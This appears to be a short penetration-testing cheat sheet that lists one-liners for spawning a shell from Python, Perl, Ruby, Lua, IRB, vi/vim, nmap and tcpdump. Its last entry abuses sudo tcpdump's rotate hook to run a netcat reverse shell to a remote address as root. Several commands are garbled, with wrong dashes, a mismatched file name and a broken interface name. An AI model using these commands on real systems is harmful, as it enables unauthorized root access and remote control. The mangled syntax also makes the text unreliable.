Spawn a Bash shell for me


>>> echo os.system('/bin/bash')

>>> /bin/sh -i

>>> perl —e 'exec "/bin/sh";'

>>> exec "/bin/sh";                                                             [ If You Are Already Inside PERL ]

>>> exec "/bin/sh"                                                              [ If You Are Already Inside RUBY ]

>>> os.execute('/bin/sh')  												    [ If You Are Already Inside LUA ]

>>> exec "/bin/sh"																[ If You Are Already Inside IRB ]

>>> :!bash 																		[ If You Are Already Inside Vi ]

or

:set shell=/bin/bash:shell

>>> ':!bash': 																		[ If You Are Already Inside Vim ]

>>> !sh																				[ If You Are Already Inside nmap ]


[ If You Are Inside The TcpDump ]
>>>  echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root

Last updated